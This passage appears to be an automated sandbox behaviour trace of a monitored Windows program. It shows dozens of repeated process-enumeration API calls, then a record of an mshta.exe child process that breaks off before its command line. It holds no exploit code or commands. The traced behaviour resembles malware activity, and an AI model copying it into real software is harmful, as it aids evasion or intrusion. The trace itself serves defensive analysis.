lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0084.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0084.330] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0084.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0084.548] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0084.793] CreateToolhelp32Snapshot 
(dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0084.798] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0085.060] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0085.064] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0085.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0085.500] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0085.715] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0085.720] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0086.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0086.031] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0091.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0091.964] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: 
lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0092.353] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0092.365] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0092.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0092.711] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0093.021] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.313] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0093.318] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0093.543] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.789] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0094.381] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0094.598] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.659] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0095.752] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.918] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0095.921] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0096.125] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.338] CreateToolhelp32Snapshot 
(dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0096.343] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0096.592] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.836] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0096.840] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.925] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0097.931] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.190] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0098.211] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.474] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0098.478] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: 
lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.646] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0098.650] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0098.727] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.102] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.198] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.398] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.524] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.664] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.738] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.743] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0099.904] Process32First (in: hSnapshot=0x18c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.982] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0099.988] Process32First (in: hSnapshot=0x18c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.066] CreateToolhelp32Snapshot 
(dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0100.073] Process32First (in: hSnapshot=0x18c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.176] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0100.180] Process32First (in: hSnapshot=0x18c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.269] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0100.273] Process32First (in: hSnapshot=0x18c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.549] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0100.553] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0100.785] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.914] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0100.918] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: 
lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0101.065] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0101.409] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0101.568] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.782] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0101.787] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0102.957] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.119] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0103.144] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0103.310] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.531] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0103.535] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0103.907] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190 [0104.163] Process32First (in: hSnapshot=0x190, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.820] CreateToolhelp32Snapshot 
(dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0104.875] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0105.126] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.380] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0108.386] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0108.869] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.099] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0109.102] Process32First (in: hSnapshot=0x1a0, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.239] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0109.244] Process32First (in: hSnapshot=0x1a0, lppe=0x292fdf3 | out: 
lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0109.422] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.332] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0110.336] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.473] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0110.478] Process32First (in: hSnapshot=0x1a4, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.987] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0110.991] Process32First (in: hSnapshot=0x1a4, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0111.070] Process32First (in: hSnapshot=0x1a4, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0111.177] Process32First (in: hSnapshot=0x1a4, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.509] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0111.513] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.096] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0112.120] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0112.207] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 64 os_tid = 0x9ec [0103.248] GetFileAttributesA (lpFileName="C:\\" (normalized: "c:")) returned 0x16 Process: id = "6" image_name = "mshta.exe" filename = "c:\\windows\\syswow64\\mshta.exe" page_root = "0x465e3000" os_pid = "0x358" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x7c4" cmd_line = "mshta.exe 
